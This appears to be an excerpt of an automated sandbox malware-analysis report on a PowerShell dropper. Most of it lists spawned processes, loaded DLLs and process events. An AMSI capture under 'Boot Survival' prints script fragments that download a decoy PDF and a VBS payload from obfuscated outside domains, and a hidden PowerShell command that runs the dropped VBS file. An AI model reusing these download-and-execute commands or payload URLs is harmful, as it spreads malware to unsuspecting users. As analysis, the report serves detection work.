      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\hqpoqw.vbs'"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File read: C:\Users\desktop.ini
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
      Source: unknown, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\8iAcoQLc3o.ps1"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\hqpoqw.vbs'"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe, Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
      Source: unknown, Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe, Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2128 --field-trial-handle=1660,i,3372118493204985000,18369712110352765169,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe, Process created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe, Process created: unknown unknown (9 occurrences)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.staterepositoryps.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dlnashext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wpdshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: qmgr.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: bitsperf.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: firewallapi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: esent.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: dnsapi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: iphlpapi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: fwbase.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: flightsettings.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: netprofm.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: npmproxy.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: bitsigd.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: upnp.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: ssdpapi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: urlmon.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: iertutil.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: srvcli.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: appxdeploymentclient.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: cryptbase.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: wsmauto.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: miutils.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: wsmsvc.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: dsrole.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: pcwum.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: mi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: gpapi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: wkscli.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: msv1_0.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: ntlmshared.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: cryptdll.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: webio.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: mswsock.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: winnsi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: rasadhlp.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: fwpuclnt.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: rmclient.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: usermgrcli.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelclient.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: coremessaging.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: twinapi.appcore.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelproxy.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: resourcepolicyclient.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: vssapi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: vsstrace.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: samcli.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: samlib.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: es.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: bitsproxy.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: schannel.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: mskeyprotect.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: ntasn1.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: ncrypt.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: ncryptsslp.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: msasn1.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: rsaenh.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: dpapi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: mpr.dll
      Source: Window Recorder | Window detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1357601906.0000021EF0D73000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000005.00000002.1590508240.0000028A66A1B000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.1505487937.0000028A4E5B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1497120784.0000028A4C5DD000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb% source: powershell.exe, 00000005.00000002.1590508240.0000028A66A1B000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.1590508240.0000028A669F1000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: b.pdb_ source: powershell.exe, 00000005.00000002.1505487937.0000028A4E5FF000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdbgement.Automation.pdb source: powershell.exe, 00000005.00000002.1497120784.0000028A4C5DD000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: gement.Automation.pdbystem.C" source: powershell.exe, 00000008.00000002.1329928980.0000021ED6963000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1353972064.0000021EF09D5000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ystem.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1353620639.0000021EF099B000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbIJ source: powershell.exe, 00000005.00000002.1511182185.0000028A4E697000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: .pdb` source: powershell.exe, 00000008.00000002.1356025565.0000021EF0C66000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF7C1100D6C push eax; ret 8_2_00007FF7C1100D6D

      Boot Survival

      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk -Name));getit -fz ($fzf + 'List of Required items and services.pdf') -oulv 'htpovwww.astd1dntd1drprisd1ds.com.pk/ms/List%20of%20rd1dquird1dd%20itd1dms%20and%20sd1drvicd1ds.pdf';getit -fz $flol -oulv 'http://www.blud1dmaxxlasd1dr.com/ms/ms.vbs';exit@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. 
Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help use

      Hooking and other Techniques for Hiding and Protection

      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
